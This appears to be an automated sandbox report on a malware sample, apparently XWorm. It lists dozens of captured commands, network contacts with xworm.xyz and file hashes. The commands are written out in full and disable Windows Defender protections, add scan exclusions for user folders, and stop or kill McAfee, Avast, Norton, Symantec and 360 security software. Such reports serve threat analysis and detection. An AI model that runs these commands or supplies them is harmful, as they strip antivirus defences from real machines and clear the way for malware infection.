reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Roaming" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Local\Temp" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScheduledScan" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableTamperProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0 -PropertyType DWORD -Force"
C:\Windows\system32\sc.exe
sc stop mfevtp
C:\Windows\system32\sc.exe
sc config mfevtp start= disabled
C:\Windows\system32\sc.exe
sc stop mfefire
C:\Windows\system32\sc.exe
sc config mfefire start= disabled
C:\Windows\system32\sc.exe
sc stop mfehidk
C:\Windows\system32\sc.exe
sc config mfehidk start= disabled
C:\Windows\system32\sc.exe
sc stop mfeapfk
C:\Windows\system32\sc.exe
sc config mfeapfk start= disabled
C:\Windows\system32\sc.exe
sc stop mfeavfk
C:\Windows\system32\sc.exe
sc config mfeavfk start= disabled
C:\Windows\system32\sc.exe
sc stop mfefirek
C:\Windows\system32\sc.exe
sc config mfefirek start= disabled
C:\Windows\system32\sc.exe
sc stop avastsvc
C:\Windows\system32\sc.exe
sc config avastsvc start= disabled
C:\Windows\system32\sc.exe
sc stop avastui
C:\Windows\system32\sc.exe
sc config avastui start= disabled
C:\Windows\system32\sc.exe
sc stop nissrv
C:\Windows\system32\sc.exe
sc config nissrv start= disabled
C:\Windows\system32\sc.exe
sc stop Symantec AntiVirus
C:\Windows\system32\sc.exe
sc config "Symantec AntiVirus" start= disabled
C:\Windows\system32\sc.exe
sc stop ccSvcHst
C:\Windows\system32\sc.exe
sc config ccSvcHst start= disabled
C:\Windows\system32\sc.exe
sc stop NortonSecurity
C:\Windows\system32\sc.exe
sc config NortonSecurity start= disabled
C:\Windows\system32\sc.exe
sc stop Norton AntiVirus
C:\Windows\system32\sc.exe
sc config "Norton AntiVirus" start= disabled
C:\Windows\system32\taskkill.exe
taskkill /F /IM Mcafee
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcafee
C:\Windows\system32\taskkill.exe
taskkill /F /IM Mcafee.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcafee.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McUICnt.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McPltCmd.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcuihost.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McInstru.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM avastui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ccSvcHst.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mfefirek.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mfehidk.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM avastsvc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McUICnt.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McPltCmd.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ModuleCoreService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ZhuDongFangYu.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM 360Safe.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM 360Tray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ns.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 193.114.54.198.in-addr.arpa | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
Files
memory/2760-0-0x00007FFF88FD3000-0x00007FFF88FD5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_deai02lx.qec.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2760-9-0x000001C47AB30000-0x000001C47AB52000-memory.dmp
memory/2760-10-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp
memory/2760-11-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp
memory/2760-12-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp
memory/2760-16-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
| MD5 | 03bf8860dbd0724e466baf1e1bca86b3 |
| SHA1 | bde4d3ef9ac846e1e83bea37f88097cd370d5197 |
| SHA256 | 968dc5ab087e7a593d9b2682c2f6ee8aa6fd756ae874328a12d892d2b68fd0af |
| SHA512 | 0f3f5492be21a3af8262363f3d593aa63080f2d2db574451d8b94d4f00c3c3f06cb17c5795e6cccef84e9ebe684062a51829139177f7539f6629373e56e2e92f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5e6baeec02c3d93dce26652e7acebc90 |
| SHA1 | 937a7b4a0d42ea56e21a1a00447d899a2aca3c28 |
| SHA256 | 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0 |
| SHA512 | 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1cebd15e19078003226326aa50667159 |
| SHA1 | 6d346e2ff9b8b6834a3e4b58240c41f5178e57f9 |
| SHA256 | ee661e2b1fa0a222a50eee925fae81512cc15faf5473a5740999e66f5eda4abe |
| SHA512 | 81ed3fd080d4e463514db6a6df8e54c24969ff8a2aea98f66153c12e0809b4e0429b2192f19afc1160ebe700c9774ce3e9e417ed3c2539e7bcbd996c94be75a4 |